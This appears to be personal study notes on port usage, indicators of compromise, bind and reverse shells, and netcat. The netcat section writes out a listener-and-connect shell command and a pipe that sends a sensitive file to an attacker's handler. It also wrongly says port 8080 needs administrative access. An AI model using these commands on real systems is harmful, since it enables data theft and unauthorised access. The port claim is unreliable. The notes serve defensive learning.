adam's notes

Protocol and Port Use Scenarios

  • IANA maintains a list of well-known (0-1023) and registered (1024-49151) TCP and UDP port mappings
    • applications use these standard ports by default
    • but any application can be configured to work on any port
  • some malware use certain ports, but there’s no definitive list
    • can adapt and change easily
  • certain port ranges are more likely to indicate a compromise
    • dynamic and private range (49152-65535) can’t be registered with IANA
      • used by clients for temporary communication sessions
    • if unknown port is open in this range, then may indicate malicious traffic
  • malware may communicate on a standard port using a different protocol
    • known as mismatched port/application traffic IoC

Non-standard Port Mitigation

  • best way to mitigate use of non-standard ports is to configure firewalls to only allow whitelisted ports to communicate ingress and egress interfaces
    • difficult to put into practice
      • causes a lot of support issues
  • create detection rules for non-standard port usage on hosts from configuration documentation
    • can also detect mismatched protocol usage over standard port

Shell and Reverse Shell

  • adversaries often use a Remote Access Tool/Trojan (RAT) to obtain a shell on the compromised system and run commands
  • shell is where the attacker opens a listening port that exposes the command prompt on the local host and connects to that port from a remote host
  • reverse shell is where the attacker opens a listening port on the remote host and causes the infected host to connect to it
    • traffic received by the infected host is redirected to the command prompt
    • typically used to exploit organizations that have not configured outbound traffic filtering at the firewall

Netcat

  • Netcat (nc) is an open-source tool native to Linux and often used by attackers
  • one common attack method:
    • uses a listener started on a victim system (IP: 10.1.0.1) and set to pipe traffic from a program or file to the handler
    • Any arbitrary, unused port will work for the listener
    • but using registered ports requires administrative access: nc -lvnp 8080
    • nc 10.1.0.1 8080 command connects to the listener and grants access to terminal
  • used the other way around, netcat can receive files
    • e.g., attacker runs cat sensitive_file.xlsx | nc 10.1.0.249 8181
      • on the handler (IP 10.1.0.249), attacker receives the file using: nc -l -p 8181 > copy_of_file.xlsx

Graph View

Backlinks